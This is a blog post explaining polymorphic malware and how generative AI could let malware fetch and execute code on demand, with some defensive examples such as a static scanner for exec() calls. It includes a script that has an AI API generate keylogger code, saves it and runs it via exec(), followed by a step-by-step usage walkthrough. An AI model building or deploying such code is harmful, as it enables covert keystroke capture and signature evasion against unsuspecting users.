Polymorphic Malware Using #AI

In the ever-evolving landscape of cybersecurity, malicious actors constantly seek new ways to infiltrate computer systems, wreak havoc, and exploit vulnerabilities. One of their most insidious tools is polymorphic malware, a shape-shifting threat that undermines traditional defense mechanisms and poses a formidable challenge to organizations and individuals alike. In this blog post I will investigate how attackers could abuse artificial intelligence to enhance polymorphism. The post is inspired by Building BlackMamba, a great piece of work by HYAS (hyas.com).

Polymorphism

Polymorphic malware is a sophisticated class of malicious software designed to mutate its code while preserving its core functionality. It achieves this by employing various obfuscation techniques that alter its appearance with each iteration, making detection and analysis a daunting task for even the most advanced security systems.

The term “polymorphic” stems from the Greek words “poly” meaning many and “morphe” meaning form. Much like a chameleon changes its color to blend into its surroundings, polymorphic malware adapts its structure, characteristics, and even its digital signature to camouflage itself from detection. This dynamic nature allows it to bypass traditional antivirus solutions, intrusion detection systems, and other security measures that rely on static signatures or patterns.

The primary objective of polymorphic malware is to remain undetected during the initial infection stage and persistently evade subsequent security measures. By constantly changing its code and behavior, it can effectively deceive security solutions, prolong its stay within the target system, and establish a foothold for carrying out malicious activities such as data theft, remote control, or launching further attacks.

To achieve its shape-shifting capabilities, polymorphic malware employs a range of techniques, including encryption, code obfuscation, self-modification, and randomization. Encryption is commonly applied to the core payload, making it difficult for security solutions to analyze or identify the underlying malicious code. Code obfuscation techniques, such as reordering instructions or inserting meaningless ones, further complicate analysis by producing many versions of the malware that look different but all achieve the same outcome.
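From the defender's side, the effect of such rewrites on static signatures can be shown with a harmless toy. The sketch below is only an illustration under stated assumptions: the two `total` variants, the `signature` helper, and the use of a SHA-256 digest as a stand-in for a static signature are all hypothetical and not taken from any real product or sample.

```python
import hashlib

# Two harmless, hypothetical variants of the same routine. Variant B renames a
# variable and adds one meaningless statement; its behaviour is unchanged.
VARIANT_A = (
    "def total(values):\n"
    "    s = 0\n"
    "    for v in values:\n"
    "        s += v\n"
    "    return s\n"
)
VARIANT_B = (
    "def total(values):\n"
    "    acc = 0\n"
    "    unused = 42  # junk statement with no effect\n"
    "    for v in values:\n"
    "        acc += v\n"
    "    return acc\n"
)


def signature(source: str) -> str:
    """Return a SHA-256 hex digest, standing in for a static signature."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def run_total(source: str, values):
    """Load a variant into its own namespace and call its total()."""
    namespace = {}
    exec(source, namespace)
    return namespace["total"](values)


# A signature database that only knows variant A.
known_signatures = {signature(VARIANT_A)}

same_behaviour = run_total(VARIANT_A, [1, 2, 3]) == run_total(VARIANT_B, [1, 2, 3])
variant_b_detected = signature(VARIANT_B) in known_signatures

print("same behaviour:", same_behaviour)
print("variant B matches known signature:", variant_b_detected)
```

Both variants return the same sum, yet the digest of variant B is absent from the signature set. This is why detection that relies only on exact byte patterns struggles with polymorphic code.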

Generative Artificial Intelligence and Code Writing

Traditionally, coding was the exclusive domain of human programmers who painstakingly crafted lines of code to bring software applications to life. However, with the advent of generative AI, the process of code writing has undergone a profound evolution. By leveraging the power of deep learning and neural networks, AI models can now analyze vast amounts of existing code and generate new, functional code that exhibits the same logic and structure as that written by humans.

One of the fundamental principles behind generative AI’s ability to write code lies in its capacity to pick up patterns, logic, and syntax from existing codebases. By training on vast repositories of open-source code, AI models learn to recognize and mimic the structure and style that characterize human-written code. The models are not given explicit grammar rules; the neural network learns statistical regularities of programming languages from examples and generalizes them to new prompts.

To illustrate the power of generative AI in code writing, let’s consider a simple example. Imagine we want to generate a Python function that calculates the factorial of a given number. Traditionally, a human programmer would write a function like this:

def factorial(n):
    if n == 0:
        return 1
    else:
        return n * factorial(n-1)

Now, let’s look at how a generative AI model might produce a function with the same functionality:

def factorial(n):
    result = 1
    while n > 0:
        result *= n
        n -= 1
    return result

In this example, the generative AI model has reproduced the concept of a factorial function, this time with an iterative implementation instead of a recursive one. The generated code is structured differently from the human-written version, but for non-negative integers the logic and the results are the same.
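The claim that both versions behave the same can be checked rather than assumed. The following is a minimal sketch: the names `factorial_recursive`, `factorial_iterative`, and `agree_on` are introduced here for illustration, and `math.factorial` from the standard library serves as the reference.

```python
import math


def factorial_recursive(n):
    # The human-written version from above.
    if n == 0:
        return 1
    return n * factorial_recursive(n - 1)


def factorial_iterative(n):
    # The generated version from above.
    result = 1
    while n > 0:
        result *= n
        n -= 1
    return result


def agree_on(inputs):
    """True if both versions match math.factorial on every input."""
    return all(
        factorial_recursive(n) == factorial_iterative(n) == math.factorial(n)
        for n in inputs
    )


all_agree = agree_on(range(0, 20))
print("both versions agree on 0..19:", all_agree)
```

The two functions only agree for non-negative integers. For a negative argument the recursive version never reaches its base case and ends in a `RecursionError`, while the iterative version returns 1, so "same functionality" holds only for the intended input range.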

Polymorphic AI Generated Code

The combination of polymorphism and AI code generation opens up the potential for highly evasive malware. The code snippet further below (excerpted from source HERE) illustrates the concept. Imagine malware that dynamically reaches out to reputable domains known for offering generative AI services, like openai.com or google.com, and requests specific functionality as well-formed code.

Subsequently, the malware can load the generated code using reflection or dynamic loading functions. Because the malicious code is generated on demand, it does not reside within the infected artifact itself, which makes it very hard to detect for defensive systems that rely on static signatures. This technique gives the malware a level of stealth that poses a significant challenge for security measures. A more explicit example is the following:

import openai
import keyboard

# Set up your OpenAI API credentials
openai.api_key = 'YOUR_API_KEY'

# Function to generate the keylogger code using OpenAI API
def generate_keylogger_code():
    prompt = "import keyboard\n\nkeyboard.on_press(lambda event: print(event.name))\nkeyboard.wait()"

    response = openai.Completion.create(
        engine='davinci-codex',
        prompt=prompt,
        max_tokens=100,
        n=1,
        stop=None,
        temperature=0.7
    )

    return response.choices[0].text.strip()

# Generate the keylogger code using OpenAI API
keylogger_code = generate_keylogger_code()

# Save the code to a file
with open('keylogger.py', 'w') as file:
    file.write(keylogger_code)

# Run the keylogger code
exec(keylogger_code)

In this specific case the attacker leverages one of OpenAI’s code-generation models, through the davinci-codex engine named in the snippet, to generate a keylogger. A keylogger is a program that records keystrokes on a computer. The same capability appears in legitimate monitoring tools, but here it serves as the malicious payload. We’ll walk through the code step by step and explain how each component works.

Setting Up OpenAI API Credentials: Before we dive into the code, make sure you have your OpenAI API credentials ready. You’ll need an API key to authenticate your requests to the OpenAI API. Replace the placeholder 'YOUR_API_KEY' in the code with your actual API key.

Generating the Keylogger Code: The heart of this code lies in the generate_keylogger_code() function. It uses the OpenAI API to generate the keylogger code from a provided prompt. The prompt in this case is itself a basic code snippet that uses the keyboard library to capture key presses and print them to the console. The function sends this prompt to the OpenAI API and retrieves a completion, which the script treats as the generated keylogger code.

To use the OpenAI API, the script requests a completion by calling openai.Completion.create(). The engine is set to 'davinci-codex', the language model to use. The prompt parameter carries the code snippet described above. Of the remaining parameters, max_tokens caps the length of the completion, temperature controls its randomness, and n=1 asks for a single completion.

Saving the Keylogger Code: Once we have the keylogger code, we save it to a file named 'keylogger.py' using a with statement and the write() method. This step allows us to store the generated code for later use or modifications.

Running the Keylogger: The final step is to execute the generated keylogger code using the exec() function. This runs the code within the current Python environment, activating the keylogger functionality. Be cautious when running keyloggers and ensure you comply with legal and ethical considerations.
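For defenders, the exec() step is one of the few things that does remain visible in the artifact. The sketch below is a simple heuristic, not a complete detector: it uses Python’s standard ast module to flag direct calls to dynamic-execution builtins in a source file without running it. The `DYNAMIC_CALLS` set, the `find_dynamic_calls` helper, and the `SAMPLE` text are assumptions made for illustration.

```python
import ast

# Builtins that run or load code at runtime; the set is an illustrative choice.
DYNAMIC_CALLS = {"exec", "eval", "compile", "__import__"}


def find_dynamic_calls(source: str):
    """Return sorted (line, name) pairs for direct calls to the builtins above.

    The source is only parsed, never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in DYNAMIC_CALLS:
                findings.append((node.lineno, node.func.id))
    return sorted(findings)


# Harmless sample: fetch() is an undefined placeholder, which is fine because
# the text is parsed but not run.
SAMPLE = "data = fetch()\nexec(data)\nprint(len(data))\n"

findings = find_dynamic_calls(SAMPLE)
print(findings)
```

A check like this only sees calls made directly by name, and dynamic execution also has many legitimate uses, so a hit is a reason to look closer rather than proof of malice. It works best alongside behavior-based monitoring, for example watching which processes contact generative AI APIs.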

Conclusion

In conclusion, generative AI lets attackers produce evasive code faster and with greater sophistication than before. This poses significant challenges for cybersecurity. It is crucial for defenders to stay ahead of the curve by continuously improving their defensive strategies and adopting advanced techniques to counter the threat posed by AI-driven malicious code. Vigilance, proactive measures, and ongoing research and development are imperative to safeguarding critical systems and data from the escalating risks of AI-enabled attacks.